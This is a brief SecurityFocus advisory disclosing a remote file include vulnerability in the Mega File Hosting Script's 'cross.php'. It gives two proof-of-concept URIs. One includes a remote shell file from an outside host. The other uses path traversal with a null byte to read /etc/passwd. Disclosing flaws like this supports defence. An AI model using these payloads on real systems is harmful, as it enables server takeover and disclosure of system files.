Mega File Hosting Script 'cross.php' Remote File Include Vulnerability

An attacker can exploit this issue via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/cross.php?url=http://example2.com/sh3ll.txt
http://www.example.com/cross.php?url=../../../.../../../../../etc/passwd%00


 

Privacy Statement
Copyright 2010, SecurityFocus